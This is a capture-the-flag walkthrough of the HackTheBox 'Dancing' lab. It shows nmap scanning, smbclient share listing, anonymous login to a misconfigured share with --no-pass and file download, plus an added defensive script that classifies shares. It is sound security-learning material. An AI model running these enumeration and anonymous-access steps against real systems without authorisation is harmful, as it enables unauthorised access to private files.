HackTheBox Dancing (Windows Room) — Full Walkthrough
This article covers a mix of theoretical knowledge and hands-on practice focused on the SMB (Server Message Block) protocol. Using the Dancing room on HackTheBox, I demonstrate how basic SMB enumeration works in a real environment and how misconfigured shares can lead to sensitive data exposure.
Task 1 – What is SMB?
SMB (Server Message Block) is a network file-sharing protocol that allows applications and users to read, write, and request services from devices on a network. It is commonly used in Windows environments for file sharing, printer access, and inter-process communication.
Task 2 – What Port Does SMB Use?
SMB primarily operates on TCP port 445. Older implementations may also use port 139 (NetBIOS), but modern systems rely on 445.
Task 3 – Identifying SMB via Nmap
To confirm SMB exposure, I ran an Nmap service scan against the target.
┌──(unknown㉿kali)-[~]
└─$ nmap -Pn -sV 10.129.32.21
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-08 11:44 EST
Nmap scan report for 10.129.32.21
Host is up (0.44s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Relevant output:
- 445/tcp – microsoft-ds
This confirms that the SMB service is running and accessible on the target machine.
Task 4 – Listing SMB Shares
The smbclient utility can be used to enumerate available shares. The -L flag lists all shares exposed by the target.
┌──(unknown㉿kali)-[~]
└─$ smbclient -L 10.129.32.21
Password for [WORKGROUP\unknown]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
WorkShares Disk
This command prompted for a password but still returned a list of accessible shares.
Task 5 – Enumerating Available Shares
From the enumeration results, the following shares were identified:
- ADMIN$
- C$
- IPC$
- WorkShares
Total shares discovered: 4
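Added example (not part of the original walkthrough): seen from the defender's side, the same listing can be triaged to separate the Windows default administrative shares from custom ones, since the custom shares are where permissions need review. The sample listing is constructed to mirror the Task 4 output, and the function names are hypothetical.

```shell
#!/bin/sh
# Constructed sample that mirrors the share listing shown in Task 4.
sample_listing() {
cat <<'EOF'
Password for [WORKGROUP\unknown]:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	WorkShares      Disk      
EOF
}

# classify_shares (hypothetical helper): read `smbclient -L` output on stdin
# and print "<class> <type> <name>" for every share row.
# Limitation: share names containing spaces are not handled.
classify_shares() {
    awk '
        # The dashed rule under the column headers opens the table.
        $1 ~ /^-+$/ && $2 ~ /^-+$/ { in_table = 1; next }
        # A blank line closes it.
        in_table && NF == 0 { in_table = 0; next }
        in_table && ($2 == "Disk" || $2 == "IPC" || $2 == "Printer") {
            # Windows creates ADMIN$, IPC$ and one <drive letter>$ share by
            # default; anything else was added by an administrator.
            if ($1 == "ADMIN$" || $1 == "IPC$" || $1 ~ /^[A-Za-z][$]$/)
                class = "default"
            else
                class = "custom"
            print class, $2, $1
        }
    '
}

# shares_to_review (hypothetical helper): names of custom shares only. These
# are the ones whose share and NTFS permissions should be checked for
# guest or anonymous access.
shares_to_review() {
    classify_shares | awk '$1 == "custom" { print $3 }'
}

# Stand-alone run: show the classification of the constructed sample.
sample_listing | classify_shares
```

On a server you administer, pipe the real `smbclient -L` output into `shares_to_review` instead of the sample.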
Task 6 – Accessing a Share with a Blank Password
The WorkShares share allowed access without authentication. Using the --no-pass option, I connected directly to the share.
smbclient --no-pass //10.129.32.21/WorkShares
Inside the share, I found directories belonging to two users:
- Amy.J
- James.P
Task 7 – Downloading Files from SMB
Within the SMB interactive shell, the get command can be used to download files to the local machine.
smb: \> cd James.p
smb: \James.p\> ls
. D 0 Thu Jun 3 04:38:03 2021
.. D 0 Thu Jun 3 04:38:03 2021
flag.txt A 32 Mon Mar 29 05:26:57 2021
5114111 blocks of size 4096. 1734201 blocks available
smb: \James.p\> get flag.txt
getting file \James.p\flag.txt of size 32 as flag.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
The file was successfully transferred to my local system.
Capturing the Flag
After downloading the file, I verified its contents locally.
┌──(unknown㉿kali)-[~]
└─$ cat flag.txt
The flag confirms successful enumeration and data access via SMB.
More walkthroughs and beginner-friendly explanations are coming soon as I continue documenting my hands-on learning journey.